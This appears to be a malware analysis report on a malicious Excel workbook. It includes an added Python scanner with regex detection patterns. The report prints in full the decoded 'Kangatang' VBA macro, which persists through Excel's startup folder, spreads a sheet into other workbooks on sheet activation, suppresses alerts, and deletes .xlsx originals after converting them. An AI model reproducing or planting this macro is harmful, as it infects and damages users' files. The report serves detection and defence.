Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2113d7ec693266af…

MALICIOUS

Office (OOXML)

Size: 379.8 KB
Created: 2006-09-13 11:21:51 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-05-23
MD5: 94c9d1fe07117dce6c36a3cd460ab928
SHA-1: 7ee2d6cab81e33c42642a82703fc6f0472d3adc4
SHA-256: 2113d7ec693266afb81b025b4a1af29debbdf4978f084ecc90ef1c3d4596354f
Risk score: 248

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is an Excel workbook carrying a VBA project whose module is named 'Kangatang'. Its Auto_Open macro disables the Ctrl+Break cancel key and Excel's alert dialogs, then, unless the workbook is already running from Excel's startup folder (Application.StartupPath, by default %APPDATA%\Microsoft\Excel\XLSTART), hides its window and saves a copy of itself there as 'mypersonnel.xls'. Excel opens every workbook in that folder at launch, so the macro runs each time Excel starts; this is the behaviour mapped to T1547.001 above. Auto_Open also sets Application.OnSheetActivate to 'mypersonnel.xls!allocated', so activating a sheet in any open workbook calls the allocated routine in the dropped copy, which inserts the 'Kangatang' sheet into that workbook if it is not already present; this is how the infection spreads to other documents the victim works on. The Auto_Close macro, on Excel 2007 (version 12) or later and only when the host file is an .xlsx, re-saves the workbook as legacy BIFF8 .xls (FileFormat:=xlExcel8) and deletes the .xlsx original. Because .xlsx cannot hold macros, the downgrade keeps the macro in a container that does, and it moves the VBA out of the OOXML vbaProject.bin part, changing the file's format and hashes; the conversion therefore serves survival as much as evasion.
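As an added example (not part of this report, and not the code of the analysis platform that produced it), the Python script below applies the kind of triage the heuristics above perform to decoded VBA source: it strips comments so that the commented-out XLSTART line is not counted, finds auto-executing entry points, matches the startup-folder self-copy, event-hook and anti-analysis patterns, extracts the dropped file name from the SaveCopyAs expression, and checks whether the event hook calls back into the dropped copy. The indicator names, regexes and weights are this example's own choices, and the sample input is an abridged copy of the macros.bas artifact listed further down.

```python
"""Triage scanner for decoded VBA source (example added to this report; the
indicator names, regexes and weights are this example's own, not the platform's)."""
import re

# Abridged copy of the macros.bas artifact from this report, used here as sample input.
SAMPLE_VBA = r'''Attribute VB_Name = "Kangatang"

Sub Auto_Open()
Application.EnableCancelKey = xlDisabled
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub Auto_Close()
On Error Resume Next
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _
FileFormat:=xlExcel8, Password:="", WriteResPassword:=""
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub
'''

ENTRY_POINT = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+(Auto_Open|Auto_Close|Auto_Exec|AutoOpen|AutoClose|"
    r"Workbook_Open|Workbook_BeforeClose|Document_Open|Document_Close)\s*\(", re.I | re.M)
SAVE_TARGET = re.compile(r"Save(?:Copy)?As\s+Filename\s*:=\s*(.+)", re.I)
STRING_LITERAL = re.compile(r'"([^"]*)"')
FILE_NAME = re.compile(r"^\\?([\w -]+\.[A-Za-z0-9]{2,4})$")   # "\mypersonnel.xls" -> mypersonnel.xls
EVENT_HOOK = re.compile(r'Application\.On\w+\s*=\s*"([^"]+)"', re.I)

# indicator name -> (regex applied per line of comment-stripped code, weight); both are this example's own
INDICATORS = {
    "persistence.office_startup_folder": (r"Application\.(?:Alt)?StartupPath\b|\\XLSTART\b", 4),
    "persistence.self_copy": (r"\.Save(?:Copy)?As\b", 2),
    "hook.sheet_activate": (r'Application\.OnSheetActivate\s*=\s*"[^"]+"', 3),
    "evasion.window_hidden": (r"Windows\(\d+\)\.Visible\s*=\s*False", 1),
    "evasion.cancel_key_disabled": (r"EnableCancelKey\s*=\s*xlDisabled", 2),
    "evasion.alerts_suppressed": (r"DisplayAlerts\s*=\s*False", 1),
    "evasion.errors_swallowed": (r"On\s+Error\s+Resume\s+Next", 1),
    "evasion.legacy_format_downgrade": (r"FileFormat\s*:=\s*xlExcel8\b", 2),
    "impact.file_deletion": (r"^\s*Kill\b", 2),
}


def strip_comments(source):
    """Drop VBA ' comments (but keep apostrophes inside string literals) so that
    commented-out code, like the old XLSTART line in the sample, is not counted.
    Rem-style comments are not handled."""
    out = []
    for line in source.splitlines():
        in_string, cut = False, len(line)
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                cut = i
                break
        out.append(line[:cut].rstrip())
    return "\n".join(out)


def scan_vba(source):
    """Return entry points, matched indicators, dropped file names, event hooks and a score."""
    code = strip_comments(source)
    report = {"entry_points": sorted({m.group(1) for m in ENTRY_POINT.finditer(code)}),
              "indicators": {}, "dropped_files": [], "event_hooks": [], "score": 0}
    for name, (pattern, weight) in INDICATORS.items():
        regex = re.compile(pattern, re.I)
        hits = [line.strip() for line in code.splitlines() if regex.search(line)]
        if hits:
            report["indicators"][name] = hits
            report["score"] += weight
    for match in SAVE_TARGET.finditer(code):
        # Pull the literal file-name part out of the path expression, e.g.
        # Application.StartupPath & "\mypersonnel.xls" -> mypersonnel.xls
        for literal in STRING_LITERAL.findall(match.group(1)):
            fname = FILE_NAME.match(literal)
            if fname and fname.group(1) not in report["dropped_files"]:
                report["dropped_files"].append(fname.group(1))
    report["event_hooks"] = EVENT_HOOK.findall(code)
    # An event hook pointing into a file the macro itself writes is the persistence
    # chain: sheet activation keeps calling into the copy saved to the startup folder.
    dropped = {d.lower() for d in report["dropped_files"]}
    report["hooks_dropped_copy"] = any(h.split("!")[0].lower() in dropped for h in report["event_hooks"])
    if report["hooks_dropped_copy"]:
        report["score"] += 3
    return report


def attack_techniques(report):
    """Map the findings to the ATT&CK techniques this report lists."""
    techniques = ["T1059.005"] if report["entry_points"] or report["indicators"] else []
    if {"persistence.office_startup_folder", "persistence.self_copy"}.issubset(report["indicators"]):
        techniques.append("T1547.001")
    return techniques
```

Calling scan_vba(SAMPLE_VBA) returns both entry points, mypersonnel.xls as the dropped file, the mypersonnel.xls!allocated hook flagged as calling into that copy, and a score of 21; the same regexes run unchanged on any olevba output. They only see literals the decoder produced, so a macro that assembles its paths at runtime (Chr(), string concatenation across variables) would need emulation rather than pattern matching.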

Heuristics 6

  • ClamAV: Xls.Malware.ExcelSic-10004731-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.ExcelSic-10004731-1
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open runs without further user interaction as soon as the workbook is opened with macros enabled
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close runs when the workbook is closed, giving the project a second automatic execution point (here used to re-save the host as .xls)
  • External relationship medium OOXML_EXTERNAL_REL
    External target in xl/drawings/_rels/drawing48.xml.rels: cid:image011.gif@01D0F513.C5945200 (a cid: URI is a MIME Content-ID, i.e. a reference to an image that was attached to an e-mail message; this points to content pasted from mail rather than a remote-template or external-data fetch, so it is a weak signal on its own)
  • Hidden worksheet (veryHidden, hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 48 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1510 bytes
SHA-256: d49b3eed57ea333340314eacd5bf3454f6a2ba3085f3bfa723034dd1a2d97cfb
Preview of the extracted script (the preview is capped at the first 1,000 lines; this module is 43 lines, so it is shown in full)
Attribute VB_Name = "Kangatang"

Sub Auto_Open()
Application.EnableCancelKey = xlDisabled


'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Application.ScreenUpdating = False
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If

    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _
FileFormat:=xlExcel8, Password:="", WriteResPassword:="", _
ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub

Sub allocated()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
    Application.ScreenUpdating = False
    currentsh = ActiveSheet.Name
    ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets(currentsh).Select
    Application.ScreenUpdating = True
 
 
 End If
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 9216 bytes
SHA-256: 43409d5281b2142658d78bc25993b4680967547d399ef58e1fc18239f8b4e7ce
Detection
ClamAV: Xls.Malware.ExcelSic-10004731-1
Obfuscation or payload: unlikely